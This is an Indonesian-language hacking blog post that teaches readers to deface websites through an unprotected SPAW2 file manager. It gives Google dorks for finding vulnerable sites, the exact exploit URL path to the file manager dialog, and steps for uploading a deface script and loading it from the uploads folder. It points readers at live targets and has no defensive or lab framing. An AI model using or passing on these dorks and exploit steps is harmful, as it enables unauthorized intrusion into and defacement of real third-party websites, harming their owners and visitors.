Penulis Hae!!! Bertemu lagi dengan testa di Oc-Tech7. Pada pertemuan kali ini testa akan share cara deface poc SPAW file manager. Poc ini sama kayak FckEditor, Karena cuman upload script saja. Okey langsung saja.
1. Bahan-bahan :
- Script Deface ext .html dan .txt
- Internet
- Hp/PC
2. Dork
- inurl:Spaw2/dialogs/
- Inurl:spaw2/uploads/files
- Index of:/Spaw2/uploads/files
3. Exploit :
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
4. Langkah-langkah
- Pertama, kita dorking dulu menggunakan salah satu dork diatas.
- Kedua, kita pilih salah satu web dan tambahkan exploit dibelakang site/
Contoh :
- Https://testatamvan.tq/spaw2/upload/files
Lalu kita tambahkan exploitnya, menjadi
- Https://testatamvan.tq/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
Kalo vuln nanti bakalan kayak gambar dibawah.
- Ketiga, kita setting dulu. Samakan kayak yg diatas (yang ditandai nomer 1)
- Keempat kita upload scriptnya (cek gambar diatas nomer 2)
Note : Kagak semuanya vuln upload html
- Kelima, Kita panggil scriptnya, caranya dengan menambahkan exploit dibelakang path / site :
/spaw2/uploads/files/namascript
/spaw2/upload/files/namascript
Contoh :
Selesai gan.
Selesai gan.
5. Live target
Note : Tambahkan dulu exploitnya
6. Tutorial video
EmoticonEmoticon